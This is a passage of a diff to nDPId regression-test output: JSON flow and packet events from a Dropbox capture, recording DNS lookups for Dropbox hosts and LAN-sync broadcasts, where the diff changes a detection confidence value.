{"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1459182798602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1459182798651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1459182798651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1459182798781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1459182798781,"pkt":"eJKcD6iO8IQvSpdgCABFAAEkAABAAEARtRHAqAH+wKgBaQA1v9gBEDDEI4aBgAABAAEABAAECWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAFAAENvCuH8AWAAIAAQABU2AAGQducy0xOTQ5CWF3c2Rucy01MQJjbwJ1awDAFgACAAEAAVNgABcHbnMtMTE2Mglhd3NkbnMtMTcDb3JnAMAWAAIAAQABU2AAFgZucy01NjQJYXdzZG5zLTA2A25ldADAFgACAAEAAVNgABMGbnMtMzE1CWF3c2Rucy0zOcAewK0AAQABAAIhDwAEzfvBO8CLAAEAAQABU1QABM37wjQHTlMtMTE2MsBwAAEAAQABU10ABM37xIrAQwABAAEAAVNaAATN+8ed"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}} 00813{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1459182798820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1459182798820,"pkt":"eJKcD6iO8IQvSpdgCABFAAE1AABAAEARtQDAqAH+wKgBaQA1xmUBIb321e+BgAABAAMABAAEAWQHZHJvcGJveANjb20AAAEAAcAMAAUAAQAAAQsABgFkAXbADsArAAEAAQAAAC0ABGygrOHAKwABAAEAAAAtAARsoKzBwC0AAgABAAD1swAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDALQACAAEAAPWzABIFbnMtNTcJYXdzZG5zLTA3wBbALQACAAEAAPWzABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwC0AAgABAAD1swAZB25zLTE5MjYJYXdzZG5zLTQ4AmNvAnVrAMCAAAEAAQACRwcABM37wDnAngABAAEAAkbtAATN+8MFwF0AAQABAAJG7QAEzfvE\/MDAAAEAAQACRuIABM37x4Y="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3RAAEARdoHAqAFpwKgB\/o1NADUALO8im6YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAHAAB"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 